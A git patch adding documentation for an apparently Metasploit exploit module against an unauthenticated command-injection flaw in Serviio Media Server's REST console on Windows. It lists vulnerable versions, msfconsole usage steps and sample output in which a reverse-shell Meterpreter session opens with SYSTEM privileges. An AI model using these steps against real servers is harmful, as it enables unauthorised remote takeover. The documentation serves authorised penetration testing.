From 283a40a279c74b8f7767b0c722e6c04e6062ba5b Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 6 May 2017 12:58:53 +0000 Subject: [PATCH] Add documentation --- .../http/serviio_checkstreamurl_cmd_exec.md | 71 +++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md diff --git a/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md new file mode 100644 index 0000000000..9dedf7b430 --- /dev/null +++ b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md @@ -0,0 +1,71 @@ +## Description + + This module exploits an unauthenticated remote command execution vulnerability in the console component of [Serviio Media Server](http://serviio.org/) versions 1.4 to 1.8 on Windows operating systems. + + The console service (on port 23423 by default) exposes a REST API which which does not require authentication. + + The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands. + +## Vulnerable Application + + Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network. + + Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS). + + This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7. + + Installers: + + * [serviio-1.8-win-setup.exe](http://download.serviio.org/releases/serviio-1.8-win-setup.exe) + * [serviio-1.7-win-setup.exe](http://download.serviio.org/releases/serviio-1.7-win-setup.exe) + * [serviio-1.6-win-setup.exe](http://download.serviio.org/releases/serviio-1.6-win-setup.exe) + * [serviio-1.5-win-setup.exe](http://download.serviio.org/releases/serviio-1.5-win-setup.exe) + * [serviio-1.4-win-setup.exe](http://download.serviio.org/releases/serviio-1.4-win-setup.exe) + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/windows/http/serviio_checkstreamurl_cmd_exec` + 3. Do: `set rhost [IP]` + 4. Do: `run` + 5. You should get a session + +## Sample Output + + ``` + msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec + msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166 + rhost => 172.16.191.166 + msf exploit(serviio_checkstreamurl_cmd_exec) > check + [*] 172.16.191.166:23423 The target appears to be vulnerable. + msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true + verbose => true + msf exploit(serviio_checkstreamurl_cmd_exec) > check + + [*] 172.16.191.166:23423 Serviio Media Server version 1.8 + [*] 172.16.191.166:23423 The target appears to be vulnerable. + msf exploit(serviio_checkstreamurl_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] Serviio Media Server version 1.8 + [*] Command Stager progress - 7.95% done (7999/100636 bytes) + [*] Command Stager progress - 15.90% done (15998/100636 bytes) + [*] Command Stager progress - 23.85% done (23997/100636 bytes) + [*] Command Stager progress - 31.79% done (31996/100636 bytes) + [*] Command Stager progress - 39.74% done (39995/100636 bytes) + [*] Command Stager progress - 47.69% done (47994/100636 bytes) + [*] Command Stager progress - 55.64% done (55993/100636 bytes) + [*] Command Stager progress - 63.59% done (63992/100636 bytes) + [*] Command Stager progress - 71.54% done (71991/100636 bytes) + [*] Command Stager progress - 79.48% done (79990/100636 bytes) + [*] Command Stager progress - 87.43% done (87989/100636 bytes) + [*] Command Stager progress - 95.38% done (95988/100636 bytes) + [*] Sending stage (957487 bytes) to 172.16.191.166 + [*] Command Stager progress - 100.00% done (100636/100636 bytes) + [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400 + + meterpreter > getuid + Server username: NT AUTHORITY\SYSTEM + meterpreter > pwd + C:\Program Files\Serviio\bin + ```